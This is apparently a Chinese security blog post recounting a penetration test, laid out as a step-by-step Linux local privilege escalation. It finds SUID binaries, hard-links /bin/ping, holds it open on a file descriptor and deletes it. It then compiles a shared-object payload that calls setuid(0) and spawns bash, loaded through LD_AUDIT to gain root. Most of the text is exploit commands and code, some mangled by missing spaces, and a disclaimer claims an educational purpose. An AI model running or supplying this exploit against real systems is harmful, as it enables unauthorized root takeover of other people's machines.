原创： Hit0n 合天智汇

MySQL密码其实挺简单的，我就想着数据库密码都这么简单，会不会ssh也是个弱口令了，尝试去连接，不能直连，遂放弃。

passwdshadow文件也没权限读。怎么办？？各种搜索，发现还有一招SUID提权法。网上关于这方面的文章也比较少。SUID是Linux的一种权限机制，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。如果拥有SUID权限，那么就可以利用系统中的二进制文件和工具来进行root提权。首先要找到系统里使用SUID的文件，使用命令find/ -perm -u=s -type f 2>/dev/null

可以看到这么多文件都是都是带SUID标识符的。这里我们使用ping。
操作步骤如下（来自博客 https://blog.csdn.net/fffygapl/article/details/51783346）
切换到tmp目录
cd/tmp
创建一个exploit目录
mkdirexploit
查看ping命令带suid权限
ll/bin/ping
创建target文件硬链接
ln/bin/ping /tmp/exploit/target
查看target文件权限
ll/tmp/exploit/target
把target文件加载到内存中
exec3< /tmp/exploit/target
查看target在内存中的情况
“ll/proc/$$/fd/3”
删除target文件
rm-rf /tmp/exploit/
查看target在内存中的情况是删除状态
“ll/proc/$$/fd/3”
创建一个c语言代码
vimpayload.c
1
2
3
4
5
6
void __attribute__((constructor))
init()// 两个下划线
{
setuid(0);
system("/bin/bash");
}
实际这里由于是反弹的bash所以不建议直接在bash下使用vim，可以自己本地写好然后传到tmp目录下即可。还有如果ll命令不可用的话可以使用ls-l代替。
利用gcc编译这段代码
gcc-W -fPIC -shared -o /tmp/exploit payload.c
提升到root权限
LD_AUDIT="\$ORIGIN"exec /proc/self/fd/3
执行完，查看当前会话已经是root

文章仅用于普及网络安全知识，提高小伙伴的安全意识的同时介绍常见漏洞的特征等，若读者因此作出危害网络安全的行为后果自负，与合天智汇以及原作者无关，特此声明！